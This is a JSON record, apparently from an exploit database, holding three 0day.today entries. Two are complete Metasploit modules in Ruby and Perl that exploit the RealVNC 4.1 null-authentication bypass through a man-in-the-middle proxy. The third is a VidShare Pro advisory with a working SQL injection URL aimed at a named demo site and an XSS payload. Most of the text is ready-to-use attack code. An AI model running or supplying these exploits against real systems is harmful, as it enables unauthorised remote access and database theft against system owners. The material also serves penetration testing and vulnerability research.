{"result": {"zdt": [{"lastseen": "2018-01-02T13:14:08", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 2, "reporter": "metasploit", "published": "2011-08-26T00:00:00", "title": "RealVNC Authentication Bypass", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T13:14:08", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-08-26T00:00:00", "id": "1337DAY-ID-16764", "href": "https://0day.today/exploit/description/16764", "sourceData": "##\r\n# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'RealVNC Authentication Bypass',\r\n 'Description' => %q{\r\n This module exploits an Authentication Bypass Vulnerability\r\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\r\n listener on LPORT and proxies to the target server\r\n \r\n The AUTOVNC option requires that vncviewer be installed on\r\n the attacking machine. 
This option should be disabled for Pro\r\n },\r\n 'Author' =>\r\n [\r\n 'hdm', #original msf2 module\r\n 'TheLightCosine <thelightcosine[at]gmail.com>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 13641 $',\r\n 'References' =>\r\n [\r\n ['BID', '17978'],\r\n ['OSVDB', '25479'],\r\n ['URL', 'http://secunia.com/advisories/20107/'],\r\n ['CVE', 'CVE-2006-2369'],\r\n ],\r\n 'DisclosureDate' => 'May 15 2006'))\r\n \r\n register_options(\r\n [\r\n OptAddress.new('RHOST', [true, 'The Target Host']),\r\n OptPort.new('RPORT', [true, \"The port the target VNC Server is listening on\", 5900 ]),\r\n OptPort.new('LPORT', [true, \"The port the local VNC Proxy should listen on\", 5900 ]),\r\n OptBool.new('AUTOVNC', [true, \"Automatically Launch vncviewer from this host\", true])\r\n ], self.class)\r\n end\r\n \r\n def run\r\n #starts up the Listener Server\r\n print_status(\"starting listener\")\r\n listener = Rex::Socket::TcpServer.create(\r\n 'LocalHost' => '0.0.0.0',\r\n 'LocalPort' => datastore['LPORT'],\r\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self }\r\n )\r\n \r\n #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine\r\n #targetting the proxy listener.\r\n if (datastore['AUTOVNC'])\r\n unless (check_vncviewer())\r\n print_error(\"vncviewer does not appear to be installed, exiting!!!\")\r\n return nil\r\n end\r\n print_status(\"Spawning viewer thread\") \r\n view = framework.threads.spawn(\"VncViewerWrapper\", false) {\r\n system(\"vncviewer 127.0.0.1::#{datastore['LPORT']}\")\r\n }\r\n end\r\n \r\n #Establishes the connection between the viewier and the remote server\r\n client = listener.accept\r\n add_socket(client)\r\n \r\n s = Rex::Socket::Tcp.create(\r\n 'PeerHost' => datastore['RHOST'],\r\n 'PeerPort' => datastore['RPORT'],\r\n 'Timeout' => 1\r\n )\r\n add_socket(s)\r\n serverhello = s.gets\r\n unless serverhello.include? 
\"RFB 003.008\"\r\n print_error(\"The VNCServer is not vulnerable\")\r\n return\r\n end\r\n \r\n #MitM attack on the VNC Authentication Process\r\n client.puts(serverhello)\r\n clienthello = client.gets\r\n s.puts(clienthello)\r\n authmethods = s.recv(2)\r\n print_status(\"Auth Methods Recieved. Sending Null Authentication Option to Client\")\r\n client.write(\"\\x01\\x01\")\r\n client.recv(1)\r\n s.write(\"\\x01\")\r\n s.recv(4)\r\n client.write(\"\\x00\\x00\\x00\\x00\")\r\n \r\n #handles remaining proxy operations between the two sockets\r\n closed = false\r\n while(closed == false)\r\n sockets =[]\r\n sockets << client\r\n sockets << s\r\n selected = select(sockets,nil,nil,0)\r\n #print_status (\"Selected: #{selected.inspect}\")\r\n unless selected.nil?\r\n if selected[0].include?(client)\r\n #print_status(\"Transfering from client to server\")\r\n begin\r\n data = client.sysread(8192)\r\n if data.nil?\r\n print_error(\"Client Closed Connection\")\r\n closed = true\r\n else\r\n s.write(data)\r\n end\r\n rescue\r\n print_error(\"Client Closed Connection\")\r\n closed = true\r\n end\r\n end\r\n if selected[0].include?(s)\r\n #print_status(\"Transfering from server to client\")\r\n begin\r\n data = s.sysread(8192)\r\n if data.nil?\r\n print_error(\"Server Closed Connection\")\r\n closed = true\r\n else\r\n client.write(data)\r\n end\r\n rescue\r\n closed = true\r\n end\r\n end\r\n end\r\n end\r\n \r\n #Garbage Collection\r\n s.close\r\n client.close\r\n print_status(\"Listener Closed\")\r\n \r\n if (datastore['AUTOVNC'])\r\n view.kill\r\n print_status(\"Viewer Closed\")\r\n end\r\n end\r\n \r\n def check_vncviewer\r\n vnc =\r\n Rex::FileUtils::find_full_path('vncviewer') ||\r\n Rex::FileUtils::find_full_path('vncviewer.exe')\r\n if (vnc)\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16764"}, {"lastseen": 
"2018-03-14T02:39:05", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Snakespc", "published": "2009-05-19T00:00:00", "title": "VidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-14T02:39:05", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-05-19T00:00:00", "id": "1337DAY-ID-5208", "href": "https://0day.today/exploit/description/5208", "sourceData": "======================================================\r\nVidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities\r\n======================================================\r\n\r\n\r\n---------------------------------------------------------------------------\r\nVidShare Pro MULTIPLE REMOTE VULNERABILITIES\t\r\n---------------------------------------------------------------------------\r\nDiscovered By: Snakespc ALGERIAN HaCkEr \r\n---------------------------------------------------------------------------\r\n\r\nScript:VidShare Pro www.omnisoftsol.com\r\n\r\nDemo:http://www.omnisoftsol.com/index.php?option=com_content&task=view&id=7&Itemid=28\r\n\r\n(listing_video.php)\r\n----------------------------------------------------------------------------\r\nExploit:SQL\r\n--------\r\nDemo:\r\nhttp://demo.omnisoftsol.com/listing_video.php?catid=2+UNION%20SELECT%201,2,3,4,CHAR(83,%20110,%2097,%20107,%20101,%20115,%2084,%20101,%2097,%2077),6,7,8,9,10,11,concat(@@version,0x3a,user(),0x3a,database()),13,14,15,16,17,18--\r\n\r\n(XSS)<----Search form---->\r\n\r\n<script>alert(1954)</script>\r\n-----------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5208"}, {"lastseen": "2018-03-20T00:17:58", "references": [], "description": "Exploit for multiple platform in category remote 
exploits", "edition": 2, "reporter": "H D Moore", "published": "2006-05-15T00:00:00", "title": "RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T00:17:58", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-05-15T00:00:00", "id": "1337DAY-ID-8707", "href": "https://0day.today/exploit/description/8707", "sourceData": "======================================================================\r\nRealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)\r\n======================================================================\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::realvnc_41_bypass;\r\n\r\nuse strict;\r\nuse base \"Msf::Exploit\";\r\nuse Pex::Text;\r\nuse IO::Socket::INET;\r\nuse POSIX;\r\n\r\nmy $advanced = {};\r\nmy $info =\r\n {\r\n\t'Name' => 'RealVNC 4.1 Authentication Bypass',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],\r\n\t'Description' =>\r\n\t Pex::Text::Freeform(qq{\r\n\t\tThis module exploits an authentication bypass flaw in version\r\n\t4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy\r\n\tbetween a VNC client and a vulnerable server. 
Credit for this should\r\n\tgo to James Evans, who spent the time to figure this out after RealVNC\r\n\treleased a binary-only patch.\r\n}),\r\n\r\n\t'Arch' => [ ],\r\n\t'OS' => [ ],\r\n\t'Priv' => 0,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],\r\n\t\t'LHOST' => [ 1, 'HOST', 'The local VNC listener host', \"0.0.0.0\" ],\r\n\t\t'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],\r\n\t\t'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],\r\n\t\t'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],\r\n\t },\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['URL', 'http://secunia.com/advisories/20107/']\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t[ 'RealVNC' ],\r\n\t ],\r\n\r\n\t'Keys' => [ 'realvnc' ],\r\n\r\n\t'DisclosureDate' => 'May 15 2006',\r\n };\r\n\r\nsub new\r\n{\r\n\tmy $class = shift;\r\n\tmy $self;\r\n\r\n\t$self = $class->SUPER::new(\r\n\t\t{\r\n\t\t\t'Info' => $info,\r\n\t\t\t'Advanced' => $advanced,\r\n\t\t},\r\n\t\t@_);\r\n\r\n\treturn $self;\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $server = IO::Socket::INET->new(\r\n\t\tLocalHost => $self->GetVar('LHOST'),\r\n\t\tLocalPort => $self->GetVar('LPORT'),\r\n\t\tReuseAddr => 1,\r\n\t\tListen => 1,\r\n\t\tProto => 'tcp');\r\n\tmy $client;\r\n\r\n\t# Did the listener create fail?\r\n\tif (not defined($server))\r\n\t{\r\n\t\t$self->PrintLine(\"[-] Failed to create local VNC listener on \" . $self->GetVar('SSHDPORT'));\r\n\t\treturn;\r\n\t}\r\n\r\n\tif ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {\r\n \tif (! fork()) {\r\n \tsystem(\"vncviewer 127.0.0.1::\".$self->GetVar('LPORT'));\r\n \texit(0);\r\n \t}\t\t\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Waiting for VNC connections to \" . $self->GetVar('LHOST') . \":\" . $self->GetVar('LPORT') . 
\"...\");\r\n\r\n\twhile (defined($client = $server->accept()))\r\n\t{\r\n\t\t$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n# Stolen from InjectVNCStage.pm\r\nsub HandleVNCClient\r\n{\r\n\tmy $self = shift;\r\n\tmy ($fd) = @{{@_}}{qw/fd/};\r\n\tmy $rhost;\r\n\tmy $rport;\r\n\r\n\t# Set the remote host information\r\n\t($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);\r\n\r\n\t# Create a connection to the target system\r\n\tmy $s = Msf::Socket::Tcp->new(\r\n\t\t'PeerAddr' => $self->GetVar('RHOST'),\r\n\t\t'PeerPort' => $self->GetVar('RPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL')\r\n\t);\r\n\t\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);\r\n\t\t$fd->Close;\r\n\t\treturn;\r\n\t}\r\n\t\r\n\tmy $res = $s->Recv(-1, 5);\r\n\t\r\n\t# Hello from server\r\n\tif ($res !~ /^RFB 003\\.008/) {\r\n\t\t$self->PrintLine(\"[*] The remote VNC service is not vulnerable\");\r\n\t\t$fd->Close;\r\n\t\t$s->Close;\r\n\t\treturn;\r\n\t}\r\n\t# Send it to the client\r\n\t$fd->Send($res);\r\n\t\r\n\t# Hello from client\r\n\t$res = $fd->Recv(-1, 5);\r\n\tif ($res !~ /^RFB /) {\r\n\t\t$self->PrintLine(\"[*] The local VNC client appears to be broken\");\r\n\t\t$fd->Close;\r\n\t\t$s->Close;\r\n\t\treturn;\r\n\t}\r\n\t# Send it to the server\r\n\t$s->Send($res);\r\n\t\r\n\t# Read the authentication methods from the server\r\n\t$res = $s->Recv(-1, 5);\r\n\t\r\n\t# Tell the client that the server only supports NULL auth\r\n\t$fd->Send(\"\\x01\\x01\");\r\n\t\r\n\t# Start pumping data between the client and server\r\n\tif (! 
fork()) {\r\n\t\t$self->PrintLine(\"[*] Proxying data between the connections...\");\r\n\t\t$self->VNCProxy($s->Socket, $fd->Socket);\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nsub VNCProxy {\r\n my $self = shift;\r\n my $srv = shift;\r\n my $cli = shift;\r\n\r\n foreach ($srv, $cli) {\r\n $_->blocking(1);\r\n $_->autoflush(1);\r\n }\r\n\r\n my $selector = IO::Select->new($srv, $cli);\r\n\r\n LOOPER:\r\n while(1) {\r\n my @ready = $selector->can_read;\r\n foreach my $ready (@ready) {\r\n if($ready == $cli) {\r\n my $data;\r\n $cli->recv($data, 8192);\r\n last LOOPER if (! length($data)); \r\n last LOOPER if(!$srv || !$srv->connected);\r\n eval { $srv->send($data); };\r\n last LOOPER if $@;\r\n }\r\n elsif($ready == $srv) {\r\n my $data;\r\n $srv->recv($data, 8192);\r\n last LOOPER if(!length($data));\r\n last LOOPER if(!$cli || !$cli->connected);\r\n eval { $cli->send($data); };\r\n last LOOPER if $@;\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\n1;\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8707"}]}}